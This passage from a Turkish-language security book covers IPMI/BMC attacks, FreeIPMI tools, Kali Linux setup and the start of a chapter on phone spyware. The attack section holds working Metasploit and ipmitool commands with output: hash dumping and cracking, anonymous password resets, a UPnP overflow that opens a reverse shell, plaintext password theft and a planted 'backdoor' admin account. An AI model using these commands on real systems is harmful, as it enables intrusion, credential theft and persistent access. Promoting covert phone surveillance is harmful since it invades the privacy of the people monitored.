sha1 karışık şifrelerini de almıştır. Otomatik kırma işlemiyle kelime listesinden
şifreleri çözmüştür. Eğer veri tabanı bağlanmış olursa, Metasploit gelecekte
kullanılmak üzere otomatik olarak karışık şifreleri ve çözümlerini veri tabanına
ekler. Eğer yerel sözlükte şifre bulunmazsa, dışarıdan sağlanan bir programla şifre
kırılır. Aşağıdaki örnekte “John the Ripper” ve “Hashcat” için bilginin nasıl
yazılacağı gösterilmiştir.
msf auxiliary(ipmi_dumphashes) > set RHOSTS 10.0.1.0/24
msf auxiliary(ipmi_dumphashes) > set THREADS 256
msf auxiliary(ipmi_dumphashes) > set OUTPUT_JOHN_FILE out.john
msf auxiliary(ipmi_dumphashes) > set OUTPUT_HASHCAT_FILE out.hashcat
msf auxiliary(ipmi_dumphashes) > run
[+] 10.0.1.100
root:ee33c2e02700000....000000000000000000000000000000001404726f6f74:8c5
76f6532 356cc342591204f41cc4eab7da6e8a
Hashcat'in ana geliştiricisi Atom'a çok teşekkürler. Sürüm 0.46 ya da üstü RAKP
karışık şifrelerini çözmektedir. Özellikleri aldıktan iki saat sonra sorunu çözdüğünü
bildirmekte yarar vardır. Aşağıdaki örnekte RAKP konumunda (7300) “hashcat”
kullanarak bir kaç saniyede 4 harflik şifreyi kaba kuvvetle çözdük.
./hashcat-cli64.bin --username -m 7300 out.hashcat -a 3 ?a?a?a?a
Initializing hashcat v0.46 by atom with 8 threads and 32mb segment-size...

Added hashes from file out.hashcat: 1 (1 salts)
[ ... ]
Input.Mode: Mask (?a?a?a)
Index.....: 0/1 (segment), 857375 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, - words
Progress..: 857375/857375 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--
ee33c2e0270000....000000000000000000000000000000001404726f6f74:8c576f65
32356cc34 2591204f41cc4eab7da6e8a:taco
Yukarıdaki tüm karışık şifreler düzeltilmiştir.
John the Ripper'in “bleeding-jumbo” dalındaki Dhiru Kholia'ya teşekkürler.
RAKP kırmayı destekliyorlar. Bilgisayarınızda “git” kurulu olduğuna emin olun
ve “John the Ripper” derleyin:
$ git clone https://github.com/magnumripper/JohnTheRipper.git
$ cd JohnTheRipper
$ git checkout bleeding-jumbo
$ cd src
$ make linux-x86-64
$ cd ../run
$ ./john --fork=8 --incremental:alpha --format=rakp ./out.john
Loaded 1 password hash (RAKP [IPMI 2.0 RAKP (RMCP+) HMAC-SHA1 32/64
OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status
taco
(10.0.1.100 root)

IPMI Anonymous (Adsız) Şifre Denetimi
Yukarıdaki şifre problemlerine ek olarak, Dan Farmer BMC'lerin “anonymous”
erişime açık olarak gönderildiklerini buldu. Bu yapılandırmada ilk kullanıcı
adının boş dizi ve şifresinin de boşluk olmasıyla anlaşıldı. ipmi_dumphashes
modülü şifre karışımını bulur ve döker (boşluk şifresi de dahildir). Yalnız
başına bu kullanıcı hesabını kullanmak zordur ama “ipmitool” yardımıyla
adlandırılmış bir kullanıcı hesabının şifresini “reset” (yenilemek) diğer
servislere erişmek için yapılabilecek bir işlemdir.
$ ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 false false true ADMINISTRATOR
2 root false false true ADMINISTRATOR
3 admin true true true ADMINISTRATOR
$ ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 password
Bu noktada BMC'ye root şifresiyle SSH üzerinden giriş yapabiliriz.
$ ssh root@10.0.0.97
root@10.0.0.97's password: password
>> SMASH-CLP Console v1.09
Supermicro IPMI UPnP Kırılganlığı
Supermicro'nun UDP 1900 kapısında IPMI Framework altında bir çok ana kart
için UPnP SSDP dinleyicisi vardır. SMT_X9_218 öncesi sürümler için bu servis
UPnP cihazlarının 1.3.1 sürümünde Inter SDK ile çalışır. Bu sürüm Rapid7'nin
Şubat 2013 kırılm açıklamsına göre Metasploit Framework içindedir. Bu
saldırıya ilişkin en ilginç olan BMC'ye root yetkisiyle erişilmesidir. Bunun
anlamı Yönetici yetkisi olan bir saldırganın tüm ağ üzerinde ya da sunucu
sistemi üzerinde root kabuğuyla çalışmasıdır. Böylece saldırgan Supermicro
BMC sürümünü aşağıya, kırılabilen bir düzeye çeker . Biz kez root erişimi
sağlanınca, açık metin kullanıcı adları dosya sisteminden alınabilir, ek
yazılımlar yüklenebilir ve işletim sistemi yeniden yükleninceye kadar
değişmeyecek arka kapılar BMC'ye eklenebilir.

$ msfconsole
=[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1119 exploits - 638 auxiliary - 179 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
msf exploit(libupnp_ssdp_overflow) > set RHOST 10.0.0.98
msf exploit(libupnp_ssdp_overflow) > set LHOST 10.0.0.55
msf exploit(libupnp_ssdp_overflow) > set PAYLOAD cmd/unix/reverse_openssl
msf exploit(libupnp_ssdp_overflow) > exploit
[*] Started reverse double handler
[*] Exploiting 10.0.0.98 with target 'Supermicro Onboard IPMI (X9SCL/X9SCM) Intel
SDK 1.3.1' with 2106 bytes to port 1900...
[+] Sending payload of 182 bytes to 10.0.0.98:4259...
[*] Command shell session 1 opened (10.0.0.55:4444 -> 10.0.0.98:3688) at 2013-
06-24 13:35:24 -0500
[*] Shutting down payload stager listener...
uname -a
Linux (none) 2.6.17.WB_WPCM450.1.3 #1 Wed Nov 14 10:33:10 PST 2012 armv5tejl
unknown
Supermicro IPMI Açık Metin Şifreleri
IPMI 2.0 özelliklerine göre HMAC tabanlı şifre denetimine BMC yanıtı SHA1 ve
MD5 olmalıdır. Bu şifre denetiminin çok açık zayıflıkları vardır (önceki
örnekte gösterildi). Ama açık metin şifrelere erişime de gereksinimi vardır.
Bununla şifre denetimi karışımını hesaplaması gerekir. BMC açık metin
şifrelerini kaybolmayan bellekte saklar. Supermicro'da üretene göre bu
dosyanın yeri değişir. Ama genelde açık metin şifre /nv/PSBlock ya da
/nv/PSStore dosyalarında saklanır. Şifreler çeşitli ikili kabarcıklar arasına
dağıtılmıştır ama bulmak kolaydır. Çünkü her zaman kullanıcı adını izlerler.
BMC ve diğer cihazlarla aynı şifreyi kullanan üreticiler için bu önemli bir
sorundur.
$ cat /nv/PSBlock
admin ADMINpassword^TT rootOtherPassword!

BMC'den Sunucuyu açma
Bir kez BMC'ye yönetici olarak erişim sağlandıktan sonra, sunucu işletim
sistemine erişmek için bir kaç yöntem kullanılabilir. En sıradan olanı,
BMC'nin KVM işlevini kırıp sunucuyu root kabuğuna düşürmek için yeniden
başlatmak (GRUB içinde init=/usr/bin/sh) ya da kurtarma diski olarak sanal
bir CD-ROM tanımlamak ve sisyemi ondan başlatmaktır. Bir kez sunucunun
diskine ham erişim sağlandı mı arka kapıdan girmek ve diskten veriyi
kopyalamak ya da güvenlikle ilgili herhangi uygun bir şeyi yapmak kolay
olur. Bu yöntemin en kötü tarafı sunucunun yeniden başlatılıyor olmasıdır.
Eğer sunucunun fiziksel konsolu kullanıcı “login” yapmış olarak duruyorsa o
zaman var olan KVM işleviyle o kullanıcıya erişmek kolay olur. Aynı şey seri
konsollar için de geçerlidir. Eğer seri kapıda şifre denetimi yapılmış bir
bağlantı varsa, ipmitool arayüzüyle BMC bu kapının kırılmasına yardımcı
olabilir. Paylaşılan donanıma erişim, hala araştırılması gereken bir durumdur.
Aynı i2c ve Super I/O yongası gibi...
Sunucudan BMC'ye Erişmek

BMC'li sunucunun en tehlikeli olduğu durum; BMC'ye geçmek için yerel
arayüzü arka kapıdan girecek kullanıcı hesabı yaratmak için kullanılmasıdır.
Daha sonra buradan sunucuya sürekli geçiş sağlanır. Bu saldırı için
sunucuda ipmitool kurulu olmalıdır. Sürücüler de BMC destekleyecek
biçimde olmalıdır. Aşağıdaki örnek sunucudaki yerel arayüz (şifre denetimi
gerekmeden) BMC'ye nasıl yeni bir kullanıcı hesabı ekleyebildiği
gösterilmiştir. Bu yöntem Linux, Windows, BSD ve hatta DOS hedefleri için
aynıdır, değişmez.
root@rcon:~# ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
root@rcon:~# ipmitool user set name 4 backdoor
root@rcon:~# ipmitool user set password 4 backdoor
root@rcon:~# ipmitool user priv 4 4
root@rcon:~# ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
4 backdoor true false true ADMINISTRATOR
Özet
Burada anlatılanlar yakın zaman kadar pek bilinmeyen, yayımlanmayan
konulardı. IPMI protokolündeki kırılganlığa ek olarak, bir çok BMC de gömülü
cihazların içinde ortak olan sorunlarla doludur. Örneğin varsayılan şifreler ve
değişmeyen şifreleme anahtarları. Bu nedenle BMC dünyası yakın zamanda
düzeltilemeyecek bir karmaşa içindedir. Bilmemiz gereken cihazlarımızın ve
ağlarımızın pek güvende olmadığıdır.

FreeIPMI
FreeIPMI programı IPMI yazılımına uygun giriş ve çıkış komutlarını destekler. IPMI
protokolü platform ve sistem yönetimini sağlayan tanımlardan oluşur. En önemli
konular sensör izleme, sistem olaylarını izleme, güç denetimi ve yerel ağ
üzerindeki seri işlemler olarak özetlenebilir. Aşağıdaki araçlar ve kitaplıklar bu
işlemleri ve daha bir çoğunu anlatır.
Büyük HPC'ler için çevresel izleme ve inceleme araçları da bu pakete eklenmiştir.
Ayrıntılar için http://www.gnu.org/software/freeipmi/documentation.html adresine
bakılabilir.
Proje Araçları
Bmc-info
Cihaz sürüm no, cihaz destek ve geniş anlamdaki tanıtım kodları gibi
BMC bilgilerini okumak için kullanılan bir araçtır.
Bnc-config
Genel anlamda BMC ve IPMI bilgileri ayarlarını yapmak için kullanılan
bir araçtır. Kullanıcı adlarının ayarları, şifreler, ağ bilgileri ve güvenlik
konularını, yerel ağ üzerinde seri işlemleri ve diğer konuları destekler
(Bakınız Ek-4)
Bnc-watchdog
BMC izleme işlemini yapan araç ya da arka plan programıdır. Bu araç
sistemin zaman aşımında yapacaklarını düzenleme ve yönetme
konularını içerir. Sistemin sorunla karşılaştığında yapılacak otomatik
işlemleri tanımlar.
Ipmi-chassis
Şasi işlemlerini (güç ve tanıtım kodu, LED gibi) kontrol eden bir araçtır.
Ipmi-fru
Ana karttaki alanla değiştirilebilen bilgileri okuyabilmek için kullanılan
bir araçtır.

Ipmi-sel
IPMI Sistem olay kayıtlarını okuyabilmek için kullanılan bir araçtır.
Sistem olay kayıtları sorunları çözmek için kullanılabilir.
Ipmi-sensors
IPMI sensör okumalarını ve veri depolarını okuyabilmek için kullanılan
bir araçtır.
Ipmipower
Uzaktan güç kontrolü yapmak için kullanılan bir araçtır.
Ipmiconsole
Yerel ağ üzerinden seri bağlantı ile konsol erişimi için kullanılan bir
araçtır.
Ipmi-raw
IPMI komutlarının onaltılı çıktısını sağlayan bir araçtır.
Ipmi-locate
BMC cihazı hakkında bilgiye erişebilen bir araçtır. Örneğin desteklenen
IPMI sürümünün numarası bu bilgilerden biridir.
Ipmi-pef-config
Platform olay elemesi bilgilerinin (PEF) ayarlarını yapmak için bir
araçtır.
Ipmi-pet
Platform olay tuzaklarını taramak ve yorumlamak için bir araçtır.
Ipmi-chassis-config
IPMI şaşi bilgilerini ayarlamak için bir araçtır. Sistemin başlatılacağı
cihaz, güç yükleme politikası ve diğer şasi işlemlerine ait ayarlar için
kullanılır.

Ipmi-sensors-config
IPMI sensörlerini ayarlamak için kullanılır. Sensör alt sınırlarını, sensör
olaylarını ve diğer sensöre bağlı işlemlerin ayarlarını yapar.
Ipmi-dcmi
Veri merkezi yönetilebilir arayüzü (DCMI) işlemlerini yapan bir araçtır.
Kaynak yönetimi ve güç yönetimiyle ilgili uzantıları destekler.
Bmc-device
Gelişmiş BMC komutlarını yapan bir araçtır. BMC değerlerini yenilemek
(reset) ACPI ayarlamak, SDR/SEL zamanını ayarlamak, olayları elle
yaratmak ve fabrika ayarlarını düzenlemek burada yapılabilen
işlemlerdir.
Ipmiping
IPMI ping aracı program denemelerinde, hata düzeltmede kullanılır.
Rmcpping
RMCP ping aracı da program düzeltme sırasında kullanılır.
Ipmi-oem
OEM'e özel komutlar için kullanılır.
Ipmidetec/Ipmidetectd
IPMI düğüm yakalamak için kullanılan arka plan programı ya da
aracıdır.
Ipmiseld
Bu arka plan program sürekli SEL'i sorgular ve olayları yerel sistem
kayıtlarına ekler.

Proje Kitaplıkları
Libfreeipmi
KCS,SSIF ve OpenIPMI Linux, Solaris BMC sürücüleri, IPMI 1.5 ve IPMI
2.0 LAN iletişim arayüzlerini içeren bir C kitaplığıdır. IPMI
okumak/yönetmek için kullanılan IPMI paket oluşturma programları,
IPMI komut programları bu kitaplıktan yararlanır.
Libipmiconsole
Yerel ağ üzerinden seri bağlantı ile SOL konsol erişimi için kullanılan
kitaplıktır.
Libipmimonitoring
Sensör izleme ve yorumlama için kullanılan bir kitaplıktır. Arayüz türü
ile kullanıcı programlarının oluşmasını sağlar.
Libipmidetect
IPMI düğüm yakalama için kullanılan bir kitaplıktır.
Ayrıntılı IPMI komut ve araçları için Ek-5'e bakınız.

BÖLÜM 7
SALDIRGAN KORUNMA
(KALI LINUX)
Bu konuda http://www.offensive-security.com/ sitesi “Endüstrinin en gerçekçi
sızma testleri Kali-linux ile yapılmaktadır” diye başlıyor. Hatta bu konuda eğitim ve
sertifika bile veriyorlar. Eğitimi alan kişilerin gerçek sızma ortamının derinliklerine
ineceklerini söylüyorlar. Burada saldırgan güvenlik ya da korunma adıyla verilen
hizmet, yüzeysel de olsa, okuyanların bilgisine sunulmaktadır.
BackTrack Linux üzerinde yapılan yedi yıllık çalışma sonunda sızma testlerine
uygun bir linuz dağılımının nasıl yapılacağı deneyimlerle öğrenilmişti.
Eğitim konularına bakıldığında bir ağa ya da bilgisayara yapılacak saldırılarda ne
kadar korunabildiğinin ayrıntılarıyla denetlendiği görülür. Konular başlık olarak
şöyle sıralanabilir:
Kali Linux ile sızma denemeleri:
Ağ yöneticileri ve güvenlik uzmanlarını ilgilendirir. Son “hack” araçlarıyla ve
benzetimleriyle donatılmıştır.
Metasploit sınırlamalarını kaldırma:
Burada tanınmış metasploit iskeletinin eksiklerinin nasıl giderildiği işlenir.
Metasploit'in açık kaynak kod özelliğini bozmadan burada eklenen kodlar
ücretsiz eklenebilir.
Kablosuz saldırlar:
Değişik yapılardaki kablosuz ağlarda etkin saldırının nasıl yapılacağı anlatılır.
Nasıl saldırıldığını bilen yöneticiler en iyi nasıl korunmaları gerektiğini de
çözerler.
Çevreyi kırmak/delmek
Bu iş sızmanın tüm kazançlarını kullanmaktır. Sızma denemeleri sırasında
karşılaşılan sorunlar ele alınır. Bugünkü saldırganların elindekileri nasıl
kullandıkları anlatılır.

Gelişmiş Windows gediklerinden yararlanma
Bir çok gelişmiş konuyu içerir. DEP ve ASLR kaytarmaları (avasion), tepe
noktası dağılması (heap spraying), işlev göstergelerini yenileme (function
pointer overwrite), tampon alan sınırlamaları (buffer space limitations) gibi
Windows gediklerinden yayarlanma ve elle yapılan kabuk kodlardan oluşur.
Gelişmiş Web saldırıları
Gelişmiş Web saldırıları ve gediklerden yararlanma, web uygulamalarının
içine sızmanın nasıl olacağını anlatır. Akıl almaz XSS saldırılarından, yarışma
koşullarındaki gedikleri çıkartma ve gelişmiş SQL ekleme saldırılarına kadar
her tür yöntem anlatılır. Böylece bugünkü Web yazılımlarında korunmanın
nasıl yapılacağı belirlenmiş olur.
Burada sözü edilen eğitimlerin ayrıntıları ilgili siteden sağlanabilir. Hatta bazı
dersler online verildiğinden kayıt yaptırma olanağı da vardır. Burada Kali Linux
hakkında öğrenilenleri anlatılacaktır.
GİRİŞ
Kali Linux Nedir
Kali Linux gelişmiş sızma denemeleri ve güvenlik denetimi dağıtımıdır.
Debian kökenli BackTrack Linux sisteminin yeniden yazılmasıyla oluşmuştur.
300'den çok sızma denemesi:
BackTrack'da var olan ve çalışmayan araçlarla aynı sonucu
üretenler kaldırıldı.
Ücretsizdir:
Kali Linuz ücretsizdir
Açık Kaynak Git ağacı:
Açık kaynak kodu desteklediklerinden tüm ürünlerin kaynak
kodları Git ağacı biçimindedir.
FHS Uyumludur:
Kali Linux FHS (File Hierarcy Standard) uyumludur. Her linux
kullanıcısı ağaç içinde ekleme yapabilir.
Kablosuz ağ desteği
Olabildiğince çok kablosuz ağı desteklemesi sağlanmaya
çalışılmıştır.
Kernel üzerinde son eklemelerin işlenmesi
Sızanlar yeni kablosuz ağ yazılımları eklemek isteyeceklerinden

kernel her zaman son eklentileri işlenmiş biçimdedir.
Güvenli Geliştirme Ortamı
Geliştiriciler güvenilir olup yalnız depolara yazılım yüklerler.
GPG imzalı paketler ve depolar:
Her geliştirici kodunu imzalar, derler ve depolara da imzalayarak
taşır.
Çoklu Dil kullanımı
İngilizcedir ama daha çok kullanıcının kendi dilini kullanması için
birden çok dile olanak tanır.
Tümüyle Kişiselleştirilebilir
Herkesin bu tasarımı beğenmeyeceği düşünülerek, herkesin
isteyebildiği değişikliği yapabilmesine olanak tanıyacak
kolaylıklar eklenmiştir.
ARMEL ve ARMHF desteği
ARM tabanlı sistemler ucuzladıkça, Kali'nin ARM desteği
yapılabildiğince kusursuz olmalıdır. Şu anda Kali aşağıdaki ARM
cihazlarında kullanılabilmektedir:
rk3306 mk/ss808
Raspberry Pi
ODROID U3/X2
Samsung Chromebook
Efika MX
Beaglebone Black
CuBox
Galaxy Note 10.1
Kali Linux Kullanılabilir mi
Sızma denemeleri ve güvenlik denetimi için düzenlenmiş olduğundan
gereksinime göre aşağıdakiler eklenmiştir.
Tek kullanıcılı root erişimlidir: Sızma ve güvenlik denetiminde yetkili
kullanıcının işlem yapması gerekir.
Varsayılan olarak ağ hizmetleri “hizmet dışıdır”. Böylece Kali değişik

hizmetlere erişip kullanabilir ve ilk dağıtım bozulmamış olur.
Kişiselleştirilebilen Linux Sunucu: Kali kablosuz ağ için yamanmış
yukarıya dönük kernel kullanır.
Kali sızma ve güvenlik amaçlı hazırlanmış bir Linux olduğundan normal linux
gibi kullanılmaz.
Kali Linux kullanıcı adı ve şifresi
Varsayılan olarak root kullanıcısı şifresi “toor” olarak tanımlanmıştır.
KALİ İNDİRME
İndirilecek Kali sürümleri
Kali Linux başlatılabilen 32 ve 64 bitlik ISO dosyaları biçimindedir.
Kali VMWare araçlarıyla kullanılabilecek biçimdedir.
Kali “ARM image” biçimdedir.
İndirilen dosyalarda SHA1 denetimi yapılmalıdır. Dosyalar aşağıdaki gibi
indirilir:
$ wget -q -O - http://archive.kali.org/archive-key.asc | gpg --import
# or
$ gpg --keyserver subkeys.pgp.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6
$ gpg --verify SHA1SUMS.gpg SHA1SUMS
gpg: Signature made Thu Mar 7 21:26:40 2013 CET using RSA key ID 7D8D0BF6
gpg: Good signature from "Kali Linux Repository "
Linux için SHA1 denetimi
$ sha1sum kali-linux-1.0-i386.iso
796e32f51d1bf51e838499c326c71a1c952cc052 kali-linux-1.0-i386.iso
$ grep kali-linux-1.0-i386.iso SHA1SUMS
796e32f51d1bf51e838499c326c71a1c952cc052 kali-linux-1.0-i386.iso
grep kali-linux-1.0-i386.iso SHA1SUMS | sha1sum -c
kali-linux-1.0-i386.iso: OK
OSX için SHA1 denetimi
$ shasum kali-linux-1.0-i386.iso
796e32f51d1bf51e838499c326c71a1c952cc052 kali-linux-1.0-i386.iso
$ grep kali-linux-1.0-i386.iso SHA1SUMS
796e32f51d1bf51e838499c326c71a1c952cc052 kali-linux-1.0-i386.iso
Windows ortamında SHA1 denetimi yoktur. Dışarıdan yazıım yükleyip denetim yapılabilir.

Canlı Kali ISO dosyası üretmek
Eğer bir Kali ortamınız varsa oradan yensini üretebilirsiniz ama yoksa
aşağıdaki adımları izlemek gerekir:
apt-get install git live-build cdebootstrap kali-archive-keyring
git clone git://git.kali.org/live-build-config.git
cd live-build-config
lb config
config/package-lists/kali.list.chroot dosyası Kali ISO içine alınacak paketleri belirler. Özel
paketlerin yüklenmesi istenebilir. Burada Kali masaüstü ortamı değiştirilebilir (KDE, Gnome,
XFCE, LXDE gib)
hooks/ Canlı Kali ISO üretilirken kullanılacak kodlar buaraya konabilir.
$ cat config/hooks/forensic-menu.binary
#!/bin/sh
cat >>binary/isolinux/live.cfg

apt-get install apt-cacher-ng
/etc/init.d/apt-cacher-ng start
export http_proxy=http://localhost:3142/
.... # setup and configure your live build
lb build
Kişiselleştirilmiş Kali Linux yapma
Güncel Kali ISO yaratma
Debian Linux içindeki live-build kullanılarak güncel Kali ISO yaratılabilir. Ama
önce aşğaıdaki paketler yüklenmelidir:
apt-get install git live-build cdebootstrap
Sonra Kali cdimage aşağıdaki gibi kopyalanır:
git clone git://git.kali.org/live-build-config.git
Şimdi aşağıdaki işlemlerle ISO yaratılabilir:
cd live-build-config
lb clean --purge
lb config
lb build
Kali Masaüstünü değiştirme
Varsayılan olarak Kali Gnome masaüstünü kullanır. Ama config/packagelists/kali.list.chroot
dosyasında değişiklik yaparak aşağıdaki masaüstlerinden
biri kulanılabilir.
KDE
Gnome
LXDE
kali-defaults
kali-root-login
desktop-base
kde-plasma-desktop
gnome-core
kali-defaults
kali-root-login
desktop-base
kali-defaults
kali-root-login

XFCE
I3WM
MATE
desktop-base
lxde
kali-defaults
kali-root-login
desktop-base
xfce4
xfce4-places-plugin
# cheers to 0xerror
xorg
dmenu
conky
i3
Yapılacak işlemler aşağıda sıralanmıştır:
echo "deb http://repo.mate-desktop.org/debian wheezy main" >> /etc/apt/sources.list
apt-get update
apt-get install mate-archive-keyring
# apt-get install git live-build cdebootstrap
# git clone git://git.kali.org/live-build-config.git
cd live-build-config
mkdir config/archives
echo "deb http://repo.mate-desktop.org/debian wheezy main" >
config/archives/mate.list.binary
echo "deb http://repo.mate-desktop.org/debian wheezy main" >
config/archives/mate.list.chroot
cp /usr/share/keyrings/mate-archive-keyring.gpg config/archives/mate.key.binary
cp /usr/share/keyrings/mate-archive-keyring.gpg config/archives/mate.key.chroot
echo "sleep 20" >> config/hooks/z_sleep.chroot
# add mate desktop to the packages list:
nano config/package-lists/kali.list.chroot
# after editing, it should look like this:
xorg
mate-archive-keyring
mate-core
mate-desktop-environment
Kali Linux Genel Kullanımı
Kali Linux kaynak kod depoları
/etc/apt/source.list içinde aşağıdaki depolar olmalıdır

deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
Kaynak kod depoları
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
Kanayan nokta depoları. Buradakiler otomatik üretilen paketlerdir.
deb http://repo.kali.org/kali kali-bleeding-edge main
#deb-src http://repo.kali.org/kali kali-bleeding-edge main
NVIDIA Sürücüleri kullanma
NVIDIA donanımını ve sürücülerini nasıl kullanılacağı burada anlatılmıştır.
İlk adım sistemi güncellemek ve kernel başlıklarını indirmiş olmaktır.
apt-get update
apt-get dist-upgrade
apt-get install -y linux-headers-$(uname -r)
apt-get install nvidia-kernel-dkms
Sonraki adım nouveau sürücüsünü kapatmaktır. Nouveau NVIDIA için açık
kaynak sürücünün adıdır.
sed 's/quiet/quiet nouveau.modeset=0/g' -i /etc/default/grub
update-grub
reboot
Sistem yeniden başlatıldığında sürücülerin doğru yüklendiğini görmek için:
root@kali:~# glxinfo | grep -i "direct rendering"
direct rendering: Yes
Aşağıdaki komutu Oclhashcat-plus kullanır:
cd /usr/share/oclhashcat-plus/
./cudaHashcat-plus.bin -t 32 -a 7 example0.hash ?a?a?a?a example.dict
cudaHashcat-plus v0.14 by atom starting...
Hashes: 6494 total, 1 unique salts, 6494 unique digests
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes
Workload: 256 loops, 80 accel
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c
Device #1: GeForce G210M, 511MB, 1468Mhz, 2MCU
Device #2: GeForce 9400M G, 253MB, 1100Mhz, 2MCU
Device #1: Kernel ./kernels/4318/m0000_a1.sm_12.64.ptx
Device #2: Kernel ./kernels/4318/m0000_a1.sm_11.64.ptx

Generated dictionary stats for example.dict: 1210228 bytes, 129988 words, 129988 keyspace
27b797965af03466041487f2a455fe52:mo0000
a48dd0f09abaf64324be83ce86414b5f:ap2300000
7becb9424f38abff581f6f2a82ff436a:sail00
1459ccf0940e63051d5a875a88acfaaf:pigi00
3baa3048651a65d1260eb521ab7c3bc0:ek110
7a7a8220266f71f54f85685969ce999f:davi0123456789
98c627ca129e64dfff3bf08fbaab6c86:fire01man
Yukarıda kartların tanındığı ve şifrelerin yenilendiği görülür.
Sanal kutu misafiri olarak Kali
Sanal Kutu (VirtualBox) altında Kali yüklenecekse VirtualBox 4.2.xx ya da
daha yüksek sürüm kullanılmalıdır. Kali bu ortamda kurulurken yapılacaklar
şöyledir.
Kali VirtualBox altında kurulduktan sonra başlatıldığında terminal penceresi
açılmalı ve aşağıdaki komutla kernel başlıkları yüklenmelidir.
apt-get update && apt-get install -y linux-headers-$(uname -r)
Daha sonra Misafir eklentileri CD'si bağlanabilir. Böylece GuestAdditions iso
sanal CD sürümüne bağlanmış olur. CD deki autorun kullanılması
sorulduğunda “Cancel” düğmesine basılarak iptal edilir. Açılan terminal
penceresinden VboxLinuxAdditions.run programı çalıştırılır.
cp /media/cd-rom/VBoxLinuxAdditions.run /root/
chmod 755 /root/VBoxLinuxAdditions.run
cd /root
./VboxLinuxAdditions.run

Yüklemeleri tamamlamak için VirtualBox Kali yeniden başlatılır.
Kali ve Windows ikili işletim sistemi
Burada yapılacak olan önceden yüklenmiş Windows diskinde ikinci bir disk
alanı açmaktır. Bunu Windows dosya yönetimiyle de yapabilirsiniz. Aşağıda
anlatılan yöntem Linux ortamında işi yapabilme biçimidir.
Öncelikle Kali indirilir ve DVD üzerinde ISO disk yapılır. USB bellek üzerinde
Kali Live yaratılır. Bilgisayarınızda Windows yanında Kali çin en az 8 GB yer
olmalı ve USB/CD Sürücüden başlatma özelliği olmalıdır.
Hazırlıklar tamamlanınca bilgisayar USB/CD sürücüden başlayacak konuma
getirilmelidir.
Kali başlatılınca “Live” ortam seçilir. Burada gparted programı çalıştırılır.

Bu program Windows disk alanını sıkıştırıp Kali için yetecek disk alanı açar.
Burada windows alanını seçilir. Bu alan genelde ikinci büyük disk alanıdır.
Windows alanı boyutu düzenlenirken Kali için (en az 8 GB) boş alan açılır.
Alan açma işlemi tamamlanınca, sistem yeniden başlatılır. Bundan sonrası
Kali'nin disk üzerine kurulumu ile aynıdır.
Kurulum bitince bilgisayarı yeniden başlatınca GRUB ekranı çıkar ve hangi
işletim sistemini kullanacağınızı sorar.
Bu konuda başka kurulum bilgileri de vardır. Gerekli ayrıntı
http://docs.kali.org web sitesinden sağlanabilir.

BÖLÜM 8
AKILLI TELEFONLARDA
DİNLEME
Burada akıllı telefonlarda kullanılabilen casus yazılımların en önemlilerinde söz
edilecektir. Aslında doğru ve güvenilir bilgi bulmak çok kolay değildir. Adı casus
yazılım olunca, yazılımın sizin bilgisayarınızda da casusuluk yapmayacağını
bilemezsiniz. Yani “Dimyata pirince giderken evdeki bulgurdan olmak” işten bile
değildir.
Aslında bu yazılımlar hakkında bilinmesi gereken çok şey vardır. Bunlar nasıl
çalışır, nereye ve nasıl yüklenir türündeni ilk bilgilere ek olarak jailbreak ya da root
işlemlerine girilince işler zor ve anlaşılması kolay olmayan konulara dönebilir.
Burada açıklamaya çalışılan konular http://acisni.com/cell-phone-spy-softwarecomplete-guide/
web sitesinde açıklanmıştır. Biz de oradaki anlatıma uygun
bilgiler vermeye çalışacağız. Amacımız en uygun ve kullanışlı yazılımı en güvenilir
kurumdan sağlamak olmalıdır. Çünkü kaç firmalarının paranızı alıp ortalardan
kaybolması çok kolay olabilir. İnceleme yaptıklarını söyleyenler de hiç yükleyip
kullanmamış olabilirler.
Bu yazılımların yalnız yasal amaçlarla kullanımını anlatmaya çalışacağız. Yasa dışı
işler bizden uzaktır. Yasal demekle incelenecek telefon size ait olmalıdır. Ya da
yetişkin birine telefonunda dinleme yapıldığını bildirilmelidir. Yasal kalabilmek
adına sizin dinleyebileceğiniz telefonlar, çocuklarınızın telefonları ya da şirket
telefonları olabilir. Şirket telefonunu kullananı daha önce uyarmanız gerekir.
Telefon casus yazılımları
Bu yazılımlar, hedef telefona yüklendiğinde o telefondan yapılan bir çok
işlemi izleyebilen yazılımlardır. BU yazılımların neler yapabildiklerini
öğrenince ilginiz daha da artabilir. Burada yazılımların neler yapabildikleri
genel anlamda anlatılmaya çalışılacaktır.
Yeniler için StealthGenie, Mobile Spy, mSpy ve Özelliklerin karşılaştırılması
biçiminde anlatılanları Ek-7'den okumaları önerilir.
Yazılımlar genelde SMS mesajlarının izlenmesi, e-posta ve web tarihçesi ile
telefon görüşmeleri listesini izlerler. Ayrıca GPS izleme de yaparlar. Bunlar
en ucuz ödeme planlarında vardır.

Daha ayrıntılı izleme özelliklerini de sağlarlar. Doğal olarak bunlar daha
pahalı ödeme planlarında yer alır. Bunların bazıları telefon görüşmelerini
kaydetmek, WhataApp, Skype ve Viber gibi servisleri izlemek, sosyal medya
kayıtlarının izlenmesi gibi hizmetleri de içermektedir.
İzleme Yazılımları Sizin Telefonunuzda çalışır mı?
Bu yazılımların çalışması için gerekenler herkesin kafasını karıştırır. Ama iki
önemli nokta bulunmalıdır:
iPhone için jailbreak alt yapısı olmalıdır. Yani bu yazılımlar jailbreak olmamış
